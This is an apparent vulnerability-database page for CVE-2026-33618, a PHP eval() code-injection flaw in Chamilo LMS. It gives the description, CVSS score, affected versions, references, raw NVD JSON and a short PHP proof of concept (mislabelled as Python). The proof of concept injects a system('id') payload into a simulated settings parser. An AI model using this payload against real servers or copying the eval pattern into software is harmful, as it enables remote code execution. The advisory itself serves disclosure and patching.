CVE-2026-33618

Description

Chamilo LMS is a learning management system. Prior to .0.0-RC.3, the PlatformConfigurationController::decodeSettingArray() method uses PHP's eval() to parse platform settings from the database. An attacker with admin access (obtainable via Advisory 1) can inject arbitrary PHP code into the settings, which is then executed when any user (including unauthenticated) requests /platform-config/list. This vulnerability is fixed in 2.0.0-RC.3.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha3:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha4:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha5:*:*:*:*:*:* - VULNERABLE

Chamilo LMS < 2.0.0-RC.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<?php
// PoC Simulation for CVE-2026-33618
// This script demonstrates how the vulnerable eval() usage can be exploited.

// Simulating the vulnerable function in PlatformConfigurationController
function decodeSettingArray($settingString) {
    // VULNERABILITY: Direct use of eval() on database content
    return eval("return " . $settingString . ";");
}

// Step 1: Attacker (Admin) injects payload into the database setting
// The payload intends to execute 'id' command on the server
// The array structure is maintained to bypass basic format checks, if any.
$maliciousPayload = "array('key' => system('id'))";

// Step 2: A normal user visits /platform-config/list
// The application loads the setting and passes it to the vulnerable function
echo "Triggering the vulnerability via /platform-config/list...\n";
$result = decodeSettingArray($maliciousPayload);

// If successful, the output of 'id' will be printed before the script ends
?>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33618
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33618
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33618/
[4] VulDB https://vuldb.com/cve/CVE-2026-33618
[5] https://github.com/chamilo/chamilo-lms/commit/f2c382c94a3f153a4d7e5ce5686c5a219fd09b3b
[6] https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-hp4w-jmwc-pg7w

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33618", "sourceIdentifier": "[email protected]", "published": "2026-04-10T19:16:22.853", "lastModified": "2026-04-17T22:03:07.113", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Chamilo LMS is a learning management system. Prior to .0.0-RC.3, the PlatformConfigurationController::decodeSettingArray() method uses PHP's eval() to parse platform settings from the database. An attacker with admin access (obtainable via Advisory 1) can inject arbitrary PHP code into the settings, which is then executed when any user (including unauthenticated) requests /platform-config/list. This vulnerability is fixed in 2.0.0-RC.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-95"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "4AF7661F-C1F7-4CAB-BBDF-FC5BF7F5BEB8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha2:*:*:*:*:*:*", "matchCriteriaId": "FE56AF71-9D53-42C6-980D-09E1C418ED87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha3:*:*:*:*:*:*", "matchCriteriaId": "01195674-9E1A-4C07-B7D3-0F0CC2E6511B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha4:*:*:*:*:*:*", "matchCriteriaId": "BAE63449-5A56-4302-A4BF-F3D19FC96A80"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha5:*:*:*:*:*:*", "matchCriteriaId": "A84A06F9-5AB7-4703-8153-33AC68882B95"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "B91302A3-53DE-4ED0-BAAB-FE9DA03F8242"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "46008D4A-96F7-4E04-8256-E115AAAE3383"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "6E2BCAFF-D44B-4E67-998A-DF855E27606B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "D2E7D018-E4C2-45F5-8D9A-DAC947173607"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "DAF96697-6B6D-459D-9510-E5CEEDC2859B"}]}]}], "references": [{"url": "https://github.com/chamilo/chamilo-lms/commit/f2c382c94a3f153a4d7e5ce5686c5a219fd09b3b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-hp4w-jmwc-pg7w", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}